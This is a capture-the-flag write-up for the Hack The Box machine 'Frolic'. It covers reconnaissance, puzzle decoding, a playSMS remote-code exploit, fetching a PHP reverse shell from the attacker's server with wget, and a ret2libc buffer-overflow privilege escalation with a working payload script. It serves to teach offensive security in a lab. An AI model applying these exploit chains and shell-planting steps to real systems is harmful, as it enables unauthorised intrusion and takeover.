Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

DansALLNotes/HTB_Writups/Frolic.md

Go to file
 
 
Cannot retrieve contributors at this time
731 lines (548 sloc) 22.7 KB
Raw Blame
Open in GitHub Desktop
---
title: Frolic
tags: Linux, Encoding
---
# Recon
Getting a bit more wise to how this works, so simulatinously visit the
web while I start the basic Nmap scanning. However, Interesting, doesnt have a
HTTP interface, so I have to hang about waiting on the scan.
## NMAP
~~~ term
dang@dang-laptop ~/Documents/HTB$ nmap -sV 10.10.10.111
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:30 GMT
Nmap scan report for 10.10.10.111
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
~~~
We can visit port 9999 and discuver wha we have an nginx server so it does after all.
~~~ term
dang@dang-laptop ~$ nmap -A 10.10.10.111 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 21:01 GMT
Nmap scan report for 10.10.10.111
Host is up (0.051s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h48m40s, deviation: 3h10m30s, median: 1m18s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: frolic
| NetBIOS computer name: FROLIC\x00
| Domain name: \x00
| FQDN: frolic
|_ System time: 2019-03-05T02:32:43+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-03-04 21:02:42
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
dang@dang-laptop ~$
~~~
## HTTP Enumeration
Port 9999 is standard page.
### Nikto
~~~
root@kali:~# nikto -host 10.10.10.111 -port 9999
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.111
+ Target Hostname: 10.10.10.111
+ Target Port: 9999
+ Start Time: 2019-03-05 15:24:48 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x5ba78110 0x27d
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ /test/: Output from the phpinfo() function was found.
+ OSVDB-3092: /test/: This might be interesting...
+ /test/index.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /test/index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /admin/index.html: Admin login page/section found.
+ 7501 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2019-03-05 15:28:50 (GMT0) (242 seconds)
---------------------------------------------------------------------
~~~
### Dirbuster
Dirbuster found
- test/
- backup/
~~~
Dir found: /test/ - 200
File found: /test/index.php - 200
Dir found: /admin/css/ - 403
Dir found: /dev/ - 403
Dir found: /admin/js/ - 403
Dir found: /backup/ - 200
File found: /backup/index.php - 200
Dir found: /dev/backup/ - 200
File found: /dev/backup/index.php - 200
- Dir found: /loop/ - 403
Dir found: /backup/loop/ - 403
Dir found: /loop/loop/ - 403
Dir found: /backup/loop/loop/ - 403
Dir found: /loop/loop/loop/ - 403
Dir found: /backup/loop/loop/loop/ - 403
Dir found: /loop/loop/loop/loop/ - 403
Dir found: /backup/loop/loop/loop/loop/ - 403
~~~
Inside dev/backup we find /playsms
Inside backup we get a username and password
- admin:imnothuman
WHICH TURN OUT TO BE SMB CREDS!! However, that lead me a "merry chase"
down the SMB, rabithole.
### Coninuing the HTTP Enum
Admin directory lives us a login page.
- Source shows admin and superduperlooperpassword_lol
Presents http://10.10.10.111:9999/admin/success.html
Which is
~~~ term
..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
~~~
> NOTE: Got a bit stuck here, Looking on the Froums, this looks like
> it could be BLurb or Ook (Is a Brainfuck Derivitive, and there is a
> clue about fish)
Converting the code (small python script perpend Ook to each argument,
then run through a onine Ook parser we end up with..
~~~
Nothing here check /asdiSIAJJ0QWE9JAS
~~~
> NOTE: This is where I discovered Cyberchef. Bloody godsend given
> that next bit is all about decoding a silly number of times.
Navigating there gives us a second message.
~~~
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA
~~~
Which with a bit of Faffing, turns out to be a zip file encoded with base 64.
- Which is password encoded.
WE make use of fcrackzip
~~~
user@kali:~$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt data.zip
PASSWORD FOUND!!!!: pw == password
user@kali:~$
~~~
Now we get an index.php file
~~~
4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a
~~~
Which if we convert to ASCII -> Then Base64 we end up with Brainfuck
Which then translates to
~~~
idkwhatispass
~~~
This works as creds (with admin) on
http://10.10.10.111:9999/playsms/index.php?app=main&inc=core_welcome
# Play SMS Exploit
https://amonsec.net/ctf/dina-ctf-walkthrough
https://www.exploit-db.com/exploits/42003/
## Getting User
Grab a script from https://github.com/jasperla/CVE-2017-9101
$ python playsms.py --url http://10.10.10.111:9999/playsms -i
And I gets user
~~~ term
> cat /home/ayush/user.txt
<Response [200]>
2ab95909cf509f85a6f476b59a0c2fe0
~~~
# Getting Root.
Standard Enumeration, Look for suid files. This time we find
~~~ term
-rwsr-xr-x 1 root root 7480 Sep 25 00:59 /home/ayush/.binary/rop
~~~
ROP, sounds like a clue.
## Trying the exploit on my machine
We can copy that acoss by copying to the www directoy, then download.
Seems like we have an overflow with some ROP based programming, so I can follow along with this
https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-october/
First Step, determine the buffer overflow
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A' * 1000"`
~~~
Or in GDB
~~~ term
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 56"`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
~~~
Looks like Grap EIP at 52 Bytes
~~~ term
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 52 + 'BBBB'"`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
~~~
We want to follow the basic ROP techingqye of ```<System><Exit></Bin/sh>```
These will live in libc so we need to find them
We also know tat they are offset from libc...
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc
libc.so.6 => /usr/lib32/libc.so.6 (0xf7dad000)
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc
libc.so.6 => /usr/lib32/libc.so.6 (0xf7d15000)
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc
libc.so.6 => /usr/lib32/libc.so.6 (0xf7d14000)
(env) dang@dang-laptop ~/Docume
~~~
This is moving around so lets
(Note: To start off with I want to make my life easy, so lets diable ALSR)
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ cat /proc/sys/kernel/randomize_va_space
2
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ sudo sysctl kernel.randomize_va_space=0
~~~
Which means Libc is now at 0x7fdc4000
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc 1 ↵
libc.so.6 => /usr/lib32/libc.so.6 (0xf7dc4000)
~~~
Lets grab System from libc (NOTE: Dont be a Dick, check the address of Libc)
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep system
257: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2.0
657: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
569: 00000000 0 FILE LOCAL DEFAULT ABS system.c
570: 0003e3f0 1071 FUNC LOCAL DEFAULT 13 do_system
5335: 0012adb0 102 FUNC LOCAL DEFAULT 13 __GI_svcerr_systemerr
6792: 0012adb0 102 FUNC LOCAL DEFAULT 13 __EI_svcerr_systemerr
7434: 0003e8f0 55 FUNC WEAK DEFAULT 13 system
7486: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2.
8144: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system
(env) dang@dang-laptop ~/Documents/HTB/Frolic$
~~~
== ``` 1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0```
Exit
~~~ term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep exit
121: 00031db0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
150: 000318e0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
~~~
And find a call to /bin/sh
~~~ term
dang@dang-laptop ~/Documents/HTB/Frolic$ strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh
17faaa /bin/sh
~~~
As these are offset we need to calculate with regard to Libc Address
- Libc 0xf7dc4000
- System 0x45380
- Exit 0x3a570
- /bin/sh 0x17faaa
|------|------------|-------------|
| Sys | 0xf7e028f0 | f7 e0 28 f0 |
| Exit | 0xf7df58e0 | f7 df 58 e0 |
| Sh | 0xf7f43aaa | f7 f4 3a aa |
Therefore our overflow becomes
```<52><System><ecit><bin/sh>```
or (Rember Endianness)
```python2 -c "print 'A'*52+'\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\xba\xfb\xf7'"``
Which gives me an error of nsorted not found...
~~~term
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\x19\x85\xf4\xf7' + 'C'*50"`
sh: nsorted: command not found
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X���CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%
~~~
> NOTE: Ended up doing this again in GDB. Turns out I was calling out
> to the wrong version of glibc. Live and Learn :(
## Thying the ROP chain in GDB
So I can work out what is happeing..
Confirm that we control EIP
~~~ term
(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"
~~~
Find the call to system and Exit (Which match our other ones)
~~~ term
Breakpoint 1 at 0x80484aa
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e028f0 <system>
(gdb)
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7df58e0 <exit>
(gdb)
~~~
We could then confirm we hit system (at least)
~~~ term
(gdb) break system
Breakpoint 2 at 0xf7e028f0
~~~
Without the Mangled Address
~~~ term
(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"`
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) continue
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
~~~
And With It
~~~ term
(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"`
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30400]
sh: $'4\325\377\377X\325\377\377': command not found
Program received signal SIGSEGV, Segmentation fault.
0xffffd500 in ?? ()
(gdb)
~~~
Adding Exit
~~~ term
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30405]
sh: $'\323\377\377': command not found
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X�[Inferior 1 (process 30403) exited with code 0300]
(gdb)
~~~
And grabbing SH from where we guessed it would be.
f7 f4 3a aa
~~~ term
(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"`
Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.
Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30938]
sh-5.0$
~~~
WOOT!!!
## Rooting the Box
Firstly the Shell I have been using is a bit fraught, Replace it the
the PHP reverse shell to see if that behaves better.
Pentest Monkey php reverse shell, Fire up a python webserver and
~~~ term
> wget 10.10.14.251:8000/dangPayload.php -O plugin/dangPayload.php
<Response [200]>
~~~
Things behave a bit better.
Nice that ALSR is turned off
~~~ term
$ cat /proc/sys/kernel/randomize_va_space
0
~~~
Lets also copy a local version across so I can play without screwing
up the main binary.
~~~ term
cp /home/ayush/.binary/rop rop
~~~
Confirm offset of libc
~~~ term
$ ldd rop | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$ ldd rop | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$
$ ldd /home/ayush/.binary/rop | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$
~~~
System
~~~ term
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
$
~~~
Exit
~~~ term
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
~~~
And SH
~~~ term
$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
15ba0b /bin/sh
$
~~~
## Offset Notes
- Libc /lib/i386-linux-gnu/libc.so.6 0xb7e19000
- System: 0x0003ada0
- Exit: 0x0002e9d0
- Bin Sh: 0x15ba0b
From the Offset Calc Script
|------------|------|----------|
| 0xb7e53da0 | 0xb7 | e5 3d a0 |
| 0xb7e479d0 | 0xb7 | e4 79 d0 |
| 0xb7f74a0b | 0xb7 | f7 4a 0b |
So Payload is
```python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7'+'\xd0\x79\xe4\xb7'+'\x0b\x4a\xf7\xb7'"```
We can try this though it doesnt help
~~~ term
$ ltrace ./dangrop `python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7\xd0\x79\xe4\xb7\x0b\x4a\xf7\xb7'"`
Segmentation fault (core dumped)
$
~~~
strace ./dangrop `python2 -c "print 'A'*52+'B'"`
Which I think Gives me what I need as I can confirm EIP.
~~~ term
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
www-data@frolic:/tmp/dg$
~~~
## Yet more Faffing for Root!!!
Had to write a script to do the calcs as I was evidently screting something up
~~~ python
#Set of Libary
"""
- System: 0x0003ada0
- Exit: 0x0002e9d0
- Bin Sh: 0x15ba0b
"""
LIBC = 0xb7e19000
SYSTEM = 0x3ada0
EXIT = 0x2e9d0
SH = 0x15ba0b
sysoffset = LIBC + SYSTEM
exitoffset = LIBC + EXIT
shoffset = LIBC + SH
#print (hex(sysoffset))
#print (hex(exitoffset))
#print (hex(shoffset))
import struct
out = "A"*52
out += struct.pack("<I",LIBC+SYSTEM)
out += struct.pack("<I",LIBC+EXIT)
out += struct.pack("<I",LIBC+SH)
print out
~~~
~~~ term
$ /home/ayush/.binary/rop `python2 calcoffsets.py`
/home/ayush/.binary/rop `python2 calcoffsets.py`
# whoami
###whoami
###root
# cd /root
# cat root.txt
####cat root.txt
####85d3fdf03f969892538ba9a731826222
~~~
# The Rabbit Hole of SMB Enumeration (RABBIT)
- Enum users comes back empty
~~~
user@MarbleArch ~ % smbmap -H 10.10.10.111
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.111...
[+] IP: 10.10.10.111:445 Name: 10.10.10.111
Disk Permissions
---- -----------
print$ NO ACCESS
IPC$ NO ACCESS
user@MarbleArch ~ %
~~~
~~~
127 user@MarbleArch ~ % nmap --script smb-enum-shares -p 139,445 10.10.10.111 :(
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-01 08:51 GMT
Nmap scan report for 10.10.10.111
Host is up (0.025s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.111\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (frolic server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.111\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 3.41 seconds
user@MarbleArch ~ %
~~~
### Manually checking
First lets enumerate the shares...
~~~
user@kali:~$ smbclient -L 10.10.10.111 -n
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\user's password:
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (frolic server (Samba, Ubuntu))
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
user@kali:~$
~~~
So the shares with need permissions
WE can check with (Print is locked down)
~~~
user@kali:~$ smbclient //10.10.10.111/IPC$ -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \>
~~~